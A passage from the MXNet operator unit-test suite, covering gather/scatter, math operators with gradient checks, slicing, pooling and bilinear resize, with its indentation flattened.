# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
